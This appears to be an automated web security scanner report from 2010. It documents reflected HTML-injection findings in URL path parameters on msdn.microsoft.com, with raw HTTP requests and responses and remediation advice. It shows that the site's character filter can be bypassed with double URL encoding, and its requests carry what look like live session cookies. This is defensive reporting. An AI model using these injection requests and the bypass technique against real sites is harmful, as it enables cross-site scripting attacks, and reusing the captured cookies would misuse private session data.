<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf0f03"><a>6c8979e7095/ms689718(v=vs.85" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2915%2522%253e%253ca%253e82109de73e3 was submitted in the REST URL parameter 3. This input was echoed as a2915"><a>82109de73e3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms689718(va2915%2522%253e%253ca%253e82109de73e3=vs.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(va2915"><a>82109de73e3=vs.85" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5739%2522%253e%253ca%253e5aed2fa913e was submitted in the REST URL parameter 1. This input was echoed as d5739"><a>5aed2fa913e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd5739"><a>5aed2fa913e/library/ms689718(v=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4104c%2522%253e%253ca%253eafd812d233f was submitted in the REST URL parameter 2. This input was echoed as 4104c"><a>afd812d233f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:26 GMT
Content-Length: 9192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4104c"><a>afd812d233f/ms689718(v=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4022c%2522%253e%253ca%253e3828408d185 was submitted in the REST URL parameter 3. This input was echoed as 4022c"><a>3828408d185 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:57 GMT
Content-Length: 9193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(v4022c"><a>3828408d185=vs.85)" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e8ab%2522%253e%253ca%253ef7a12be2b11 was submitted in the REST URL parameter 1. This input was echoed as 8e8ab"><a>f7a12be2b11 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8e8ab%2522%253e%253ca%253ef7a12be2b11/library/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:59 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8e8ab"><a>f7a12be2b11/library/ms690384(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65890%2522%253e%253ca%253ec471cad6006 was submitted in the REST URL parameter 2. This input was echoed as 65890"><a>c471cad6006 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library65890%2522%253e%253ca%253ec471cad6006/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library65890"><a>c471cad6006/ms690384(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e453%2522%253e%253ca%253e10d89de2b26 was submitted in the REST URL parameter 3. This input was echoed as 7e453"><a>10d89de2b26 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms690384(VS.85).aspx7e453%2522%253e%253ca%253e10d89de2b26 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:24 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms690384(VS.85).aspx7e453"><a>10d89de2b26" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34672%2522%253e%253ca%253e13af3ebde69 was submitted in the REST URL parameter 1. This input was echoed as 34672"><a>13af3ebde69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us34672%2522%253e%253ca%253e13af3ebde69/library/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us34672"><a>13af3ebde69/library/ms691105(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcffb%2522%253e%253ca%253e734127f3eb7 was submitted in the REST URL parameter 2. This input was echoed as fcffb"><a>734127f3eb7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfcffb%2522%253e%253ca%253e734127f3eb7/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
